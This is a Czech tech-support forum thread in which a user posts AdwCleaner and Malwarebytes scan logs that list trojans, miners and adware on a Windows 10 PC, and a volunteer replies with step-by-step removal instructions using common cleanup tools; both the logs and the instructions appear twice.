Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.inf
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingat
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.inf
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.i
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
Klíč nalezen: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Klíč nalezen: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Internetové prohlížeče ] *****
Nebyly nalezeny žádné škodlivé položky prohlížeče Firefox.
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - hxxp://www.mystartsearch.com/webfavicon.ico
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - fcfenmboojpjinhpgggodefccipikbpd
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [10694 Bajty] - [15/03/2017 17:24:58]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10768 Bajty] ##########
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 17:33
Logovací soubor: malware.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 423590
Uplynulý čas: 5 min, 57 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 14
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Žádná uživatelská akce, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS, Žádná uživatelská akce, [2399], [380104],1.0.1509
Soubor: 6
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS\FF.HP, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\ff.NT, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\snp.sc, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Žádná uživatelská akce, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Server]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Skenování
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
Služba nalezena: Plusdax
***** [ Složky ] *****
Složka nalezena: C:\Users\Nekut\AppData\Local\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Roaming\cpuminer
Složka nalezena: C:\Users\Nekut\AppData\Roaming\ppslog
Složka nalezena: C:\Program Files\NixSrv
Složka nalezena: C:\ProgramData\AVG Security Toolbar
Složka nalezena: C:\ProgramData\Uniblue
Složka nalezena: C:\ProgramData\Plusdaxs
Složka nalezena: C:\ProgramData\Plusdax
Složka nalezena: C:\Program Files (x86)\globalUpdate
Složka nalezena: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
Soubor nalezen: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Installer.dat
Soubor nalezen: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
Nebyly nalezeny žádné škodlivé DLL.
***** [ WMI ] *****
Nebyly nalezeny žádné škodlivé klíče.
***** [ Zástupci ] *****
Žádný infikovaný zástupce nenalezen.
***** [ Naplánované úlohy ] *****
Žádná nebezpečná úloha nenalezena.
***** [ Registry ] *****
Klíč nalezen: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
Klíč nalezen: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
Klíč nalezen: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
Klíč nalezen: HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\driverscanner
Klíč nalezen: [x64] HKLM\SOFTWARE\Classes\ppsmb
Klíč nalezen: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
Klíč nalezen: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
Klíč nalezen: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
Klíč nalezen: HKCU\Software\GlobalUpdate
Klíč nalezen: HKCU\Software\PPStream
Klíč nalezen: HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: HKCU\Software\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\GlobalUpdate
Klíč nalezen: HKLM\SOFTWARE\SimpleFiles
Klíč nalezen: HKLM\SOFTWARE\SupDp
Klíč nalezen: HKLM\SOFTWARE\Uniblue
Klíč nalezen: HKLM\SOFTWARE\Uniblue\DriverScanner
Klíč nalezen: HKLM\SOFTWARE\SUPDP
Klíč nalezen: HKLM\SOFTWARE\mtPlusdax
Klíč nalezen: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
Klíč nalezen: [x64] HKCU\Software\GlobalUpdate
Klíč nalezen: [x64] HKCU\Software\PPStream
Klíč nalezen: [x64] HKCU\Software\INSTALLPATH\STATUS
Klíč nalezen: [x64] HKCU\Software\mtPlusdax
Klíč nalezen: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
Data nalezena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] -
Klíč nalezen: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.inf
Klíč nalezen: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Klíč nalezen: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingat
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.inf
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.i
Klíč nalezen: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
Hodnota nalezena: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
Klíč nalezen: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
Klíč nalezen: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Internetové prohlížeče ] *****
Nebyly nalezeny žádné škodlivé položky prohlížeče Firefox.
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] - hxxp://www.mystartsearch.com/webfavicon.ico
Chromium nastavení nalezeno: [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences ] - fcfenmboojpjinhpgggodefccipikbpd
*************************
C:\AdwCleaner\AdwCleaner[S0].txt - [10694 Bajty] - [15/03/2017 17:24:58]
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [10768 Bajty] ##########
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 17:33
Logovací soubor: malware.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 423590
Uplynulý čas: 5 min, 57 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 14
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Žádná uživatelská akce, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 1
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS, Žádná uživatelská akce, [2399], [380104],1.0.1509
Soubor: 6
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\EJCZTION\HBSJODVP.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
Trojan.Miuref.THC, C:\USERS\NEKUT\APPDATA\LOCAL\OPWICS\BZCJICBL.DLL, Žádná uživatelská akce, [8042], [65255],1.0.1509
PUP.Optional.Linkury.Generic, C:\PROGRAMDATA\PLUSDAXS\FF.HP, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\ff.NT, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\ProgramData\Plusdaxs\snp.sc, Žádná uživatelská akce, [2399], [380104],1.0.1509
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Žádná uživatelská akce, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
- jaro3
- člen Security týmu
-
Guru Level 15
- Příspěvky: 43113
- Registrován: červen 07
- Bydliště: Jižní Čechy
- Pohlaví:
- Stav:
Offline
Re: Prosím o kontrolu logu
Spusť znovu AdwCleaner (u Windows Vista či Windows7, klikni na AdwCleaner pravým a vyber „Spustit jako správce“
klikni na „Scan“, po prohledání klikni na „ Clean“
Program provede opravu, po automatickém restartu klikni na „Log Manager“ a pak poklepej na odpovídají log, (C:\AdwCleaner [C?].txt) , jeho obsah sem celý vlož.
Stáhni si Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
na svojí plochu.
Deaktivuj si svůj antivirový program. Pravým tl. myši klikni na JRT.exe a vyber „spustit jako správce“. Pro pokračování budeš vyzván ke stisknutí jakékoliv klávesy. Na nějakou klikni.
Začne skenování programu. Skenování může trvat dloho , podle množství nákaz. Po ukončení skenu se objeví log (JRT.txt) , který se uloží na ploše.
Zkopíruj sem prosím celý jeho obsah.
. spusť znovu Malwarebytes' Anti-Malware a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.
Sophos Virus Removal Tool je praktický softwarový nástroj, který by mohl odstranit infekce, které antivirový program nedetekuje .
Stáhněte si ho zde z některého odkazu:
http://www.majorgeeks.com/mg/get/sophos ... ool,1.html
http://www.majorgeeks.com/mg/getmirror/ ... ool,1.html
http://www.majorgeeks.com/mg/getmirror/ ... ool,2.html
Viry mohou zpomalit počítač, nebo se snaží ukrást vaše data, a ani nevíte , že je máte. Co potřebujete, je rychlý a snadný způsob, jak je najít a zbavit se jich, pokud již máte antivirový program v počítači nainstalován , můžete nainstalovat i nástroj Sophos Virus Removal , který identifikuje a vyčistí zbylé infekce, které mohl Váš antivirový program přehlédnout.
K použití Sophos Virus Removal Tool na něj poklepejte a stiskněte tlačítko „Start scanning“ . Pak bude Sophos Virus Removal Tool vyhledávat a odstraňovat viry, které najde. Může být vyžadován restart.
Stáhni si RogueKiller by Adlice Software
32bit.:
http://www.adlice.com/download/roguekil ... HlwZT14ODY
64bit.:
http://www.adlice.com/download/roguekil ... HlwZT14NjQ
na svojí plochu.
- Zavři všechny ostatní programy a prohlížeče.
- Pro OS Vista a win7,8,10 spusť program RogueKiller.exe jako správce , u XP poklepáním.
- klikni na „Start Scan“. V novém okně nic neměň a klikni dole na „Start Scan“
- Program skenuje procesy PC. Po proskenování klikni na „Open Report “ , v okně pak na „Open TXT“ a celý obsah logu sem zkopíruj.
Pokud je program blokován , zkus ho spustit několikrát. Pokud dále program nepůjde spustit a pracovat, přejmenuj ho na winlogon.exe.
-pokud bude mít log více než 60.000 znaků , rozděl ho a vlož do více příspěvků
klikni na „Scan“, po prohledání klikni na „ Clean“
Program provede opravu, po automatickém restartu klikni na „Log Manager“ a pak poklepej na odpovídají log, (C:\AdwCleaner [C?].txt) , jeho obsah sem celý vlož.
Stáhni si Junkware Removal Tool by Thisisu
http://www.bleepingcomputer.com/downloa ... oval-tool/
na svojí plochu.
Deaktivuj si svůj antivirový program. Pravým tl. myši klikni na JRT.exe a vyber „spustit jako správce“. Pro pokračování budeš vyzván ke stisknutí jakékoliv klávesy. Na nějakou klikni.
Začne skenování programu. Skenování může trvat dloho , podle množství nákaz. Po ukončení skenu se objeví log (JRT.txt) , který se uloží na ploše.
Zkopíruj sem prosím celý jeho obsah.
. spusť znovu Malwarebytes' Anti-Malware a dej Skenovat nyní
- po proběhnutí programu se ti objeví hláška tak klikni na „Vše do karantény(smazat vybrané)“ a na „Exportovat záznam“ a vyber „textový soubor“ , soubor nějak pojmenuj a někam ho ulož. Zkopíruj se celý obsah toho logu.
Sophos Virus Removal Tool je praktický softwarový nástroj, který by mohl odstranit infekce, které antivirový program nedetekuje .
Stáhněte si ho zde z některého odkazu:
http://www.majorgeeks.com/mg/get/sophos ... ool,1.html
